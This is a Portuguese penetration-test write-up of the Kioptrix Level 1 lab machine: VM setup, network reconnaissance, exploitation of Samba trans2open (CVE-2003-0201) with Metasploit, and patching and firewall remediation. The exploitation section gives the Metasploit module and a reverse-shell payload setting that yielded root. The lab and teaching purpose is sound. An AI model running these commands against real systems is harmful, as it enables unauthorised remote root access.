Kioptrix Level 1: Auditoria e Exploração de Vulnerabilidades de Espectro Completo
🏛️ Objetivo Profissional
O objetivo era realizar um teste de penetração estruturado no ambiente Kioptrix Level 1 para alcançar o comprometimento total do 'root' e documentar estratégias técnicas de remediação adequadas para operações das equipes Red e Blue.
🏗️ Reprodução do Ambiente (Detalhes de Hardware)
Os padrões de virtualização modernos geralmente falham em kernels legados de 2010. Para inicializar e conectar esta máquina com sucesso, as seguintes configurações arquiteturais específicas foram necessárias:
- Subtipo de SO: Linux / Red Hat (32 bits).
- Arquitetura de Armazenamento: Alterado de SATA para Controlador IDE para suportar o disco rígido .vmdk legado.
- Protocolo de Rede: Configurado como PCI FAST-III com um adaptador Host-only para permitir comunicação interna com a máquina de ataque Kali Linux.
⚔️ Análise Ofensiva (Caminho do Red Team)
A exploração seguiu um ciclo de vida manual de enumeração até a exploração:
1. Descoberta e Reconhecimento
- Netdiscover: Usado
netdiscover -r 192.168.184.4 para identificar o IP do alvo.
- Varredura Nmap: Identificou serviços incluindo SSH (22), HTTP (80), RPC (111) e NetBIOS-SSN (139). O Samba 2.2.1a foi sinalizado como o principal ponto de entrada.
2. Exploração (Samba trans2open)
- Vulnerabilidade: CVE-2003-0201 (Heap Overflow).
- Mapeamento MITRE ATT&CK: - Tática: Privilege Escalation (TA0004)
- Técnica: Exploitation for Privilege Escalation (T1068)
- Protocolo Metasploit:
use exploit/linux/samba/trans2open
set RHOSTS 192.168.114.5
set payload linux/x86/shell/reverse_tcp
- Resultado: Reverse shell gerada com sucesso. O comando
whoami retornou root.
Para proteger um ambiente corporativo, as seguintes estratégias de Gerenciamento de Vulnerabilidades (VM) são obrigatórias:
- Protocolo de Patch: Atualize o Samba para a versão suportada mais recente (Samba 4.x). A vulnerabilidade na função
call_trans2open é efetivamente corrigida em todas as versões modernas.
- Endurecimento de Rede: Implante firewalls baseados em host para restringir as Portas 139 e 445 apenas a sub-redes internas confiáveis.
- Estratégia do Papel do VM: Esta remediação se enquadra nos ciclos padrão de Gerenciamento de Vulnerabilidades em horário comercial, garantindo a estabilidade da infraestrutura.
📝 Evidências Técnicas e Registros Manuais
As seguintes imagens documentam a enumeração manual ao vivo e a execução no terminal:
Descoberta do Alvo e Notas de Arquitetura


Prova de Acesso Root (Captura de Terminal)
Evidência do Shell Root